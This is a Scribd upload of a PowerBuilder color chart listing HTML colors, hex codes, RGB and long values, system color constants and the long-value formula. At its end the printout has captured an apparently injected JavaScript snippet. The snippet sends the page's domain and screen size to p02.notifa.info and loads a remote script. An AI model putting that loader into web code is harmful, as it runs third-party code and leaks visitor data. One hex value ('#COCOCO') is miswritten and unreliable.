0% found this document useful (0 votes)
667 views1 page

PB Color Chart

This document provides a color chart that lists HTML colors, their hexadecimal codes, and their equivalent colors in PowerBuilder. It includes common colors like black, white, gray, red, blue, green, as well as their lighter and darker shades. The formula to generate the long hexadecimal value for a color is also provided which is the sum of blue, green, and red values multiplied by powers of 256.

Uploaded by

JOHNSONOKY
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
667 views1 page

PB Color Chart

This document provides a color chart that lists HTML colors, their hexadecimal codes, and their equivalent colors in PowerBuilder. It includes common colors like black, white, gray, red, blue, green, as well as their lighter and darker shades. The formula to generate the long hexadecimal value for a color is also provided which is the sum of blue, green, and red values multiplied by powers of 256.

Uploaded by

JOHNSONOKY
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

1/24/2018 Color Chart

Color Chart

HTML Color Powerbuilder Color Red Green Blue Long


Black #000000 Black 0 0 0 0
White #FFFFFF White 255 255 255 16777215
Silver #COCOCO Gray 192 192 192 12632256
Gray #808080 DarkGrey 128 128 128 8421504
Red #FF0000 Red 255 0 0 255
Maroon #800000 DarkRed 128 0 0 128
Lime #00FF00 Green 0 255 0 65280
Green #008000 DarkGreen 0 128 0 32768
Blue #0000FF Blue 0 0 255 16711680
Navy #000080 DarkBlue 0 0 128 8388608
Fuchsia #FF00FF Magenta 255 0 255 16711935
Purple #800080 DarkMagenta 128 0 128 8388736
Aqua #00FFFF Cyan 0 255 255 16776960
Teal #008080 DarkCyan 0 128 128 8421376
Yellow #FFFF00 Yellow 255 255 0 65535
Olive #808000 Brown 128 128 0 32896
System Colors
Windows Text 2^25=33554432
Button Face 2^26=67108864
Scrollbar 2^27=134217728
Application Workspace 2^28=268435456
Transparent 2^29=536870912
Windows Background 2^30= 1073741824

The formula to generate the long value is: (65536*Blue) + (256*Green) + (Red)

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url
= (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" +
"?id=1" + "&enc=9UwkxLgY9" + "¶ms=" +
"4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m4CmRs2AvcGyoDL5Ctn4wl9MnKGaYLDlG8KN0oe3jmdMdQRBHH6679rZiIhsTmzDeWxm90qvBMELMxZDY1s5IY8
+ "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type =
'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};

http://rainbowprod.com/english/powerbuilder/colors.html 1/1

You might also like